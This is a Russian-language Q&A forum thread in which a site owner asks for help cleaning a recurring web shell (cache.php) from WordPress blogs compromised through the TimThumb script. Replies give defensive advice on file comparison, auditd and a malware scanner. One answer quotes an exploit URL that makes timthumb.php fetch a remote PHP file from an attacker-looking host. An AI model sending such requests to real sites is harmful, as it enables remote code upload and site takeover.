Wordpress и уязвимость в Timthumb?

Question

[mihavxc]

Добрый день, помогите вычистить шелл с Wordpress.


Есть свой сервер с десятком сайтов и двумя никому ненужными блогами на Wodrpress(3.5.1). На них по сути никто кроме поисковиков и не заходит. На обоих блогах были установлены темы от Woothemes.com и пяток плагинов. Все, кроме тем старался регулярно обновлять. Однажды заметил, что через скрипт cache.php на этих блогах размещают страницы со ссылками на другие сайты.


Погуглив понял, что проблема в уязвимости скрипта Timthumb, который использовался в темах. Обновил фреймворки тем, в настройках тем отключил использование этого скрипта и удалил сами скрипты во всех директориях. Поставил плагин Timthumb Scanner, который ищет скрипты Timthumb, обновляет их и сообщает, если они уже взломаны.


В итоге сейчас наблюдаю следующую картинку — после удаления скриптов спустя пару часов скрипт cache.php появляется снова в /wp-content/uploads/2012/12, причем версии 2.8.10(последняя 2.8.11). Если обновляю скрипт, то спустя пару часов версия будет снова 2.8.10. Если не обновлять, то через какое-то время плагин скажет, что скрипт был взломан.


Пробовал отключать полностью все плагины — тот же результат. Смотрел логи — никаких странных запросов. Если переименовать файл index.php в корне, то ломать перестают. Дописывал в index.php логгер всех POST запросов — ничего странного. Никак не пойму как именно меня ломают, весь очевидно, что это происходит на автомате. В логах ssh/ftp тоже ничего подозрительного. Может кто уже сталкивался с подобным?

Answer 1

[ТыжСисАдмин]

Ищите шелл.
Сравните все файлы движка с оригиналами.

Этого никто не делает руками, всё на автомате. Если на индексе 404 то «взлом не производится» — про переименнованый index.php

Answer 2

[ТыжСисАдмин]

Также не факт что взлом производится непосредственно через движок wordpress, тут можно на соседей грешить. Хот всё зависит от настроек сервера.

Comments

[mihavxc]

Соседи — маловероятно. Видно, что ломают WP на автомате.

[ТыжСисАдмин]

Для начала всё-же сравнить файлы или загрузить заведомо чистые.
Другой вариант — дыра в движке, но вы первый от кого слышу об этой проблеме да и у самого 3.5.1 и без проблем.

[mihavxc]

Да на дыру в движке я и не грешу, определенно timthumb из темы был рассадником заразы. Конечно, придется все файлы сравнивать, но читую версию темы, которая установлена у меня вряд ли найду, а сравнивать с другой версией особого смысла нет(судя по changelog они много всего обновили уже). Накатывать чистую тему тоже поблематично — я ее под себя затачивал основательно. Просто не понимаю как такое вообще происходит, что в логах ничего нет…

[ТыжСисАдмин]

Вот что в логах пусто, поэтому и упомянул соседей.

[mihavxc]

А есть ли какой-то демон, который сможет сказать, что за процесс создал файл?
Пока нашел только мониторшики изменений ФС, но они не показывают какой процесс их создал.

[Aleksey Bernackiy]

Данные о процессе, который создал файл, не хранятся в Linux. Если сервер на Windows — technet.microsoft.com/ru-ru/sysinternals/bb896645

[mihavxc]

именно поэтому я и спрашиваю демона, который бы мониторил все системные вызовы и определил какой процесс создал файл. Сейчас мучаю auditd, но не полностью уверен, что он сможет это определить.

Answer 3

[stan_jeremy]

не понял зачем вы внедряли логгер пост запросов? бага же в гете

/wp-content/themes/pbv_multi/scripts/timthumb.php?src=http://picasa.com.xpl.be/yahoo.php

Comments

[mihavxc]

Подобных запросов 100% нет, так что решил проверить пост, может там что интересное поймаю)

Answer 4

[Bo0oM]

Ai bolit?
revisium.com/ai/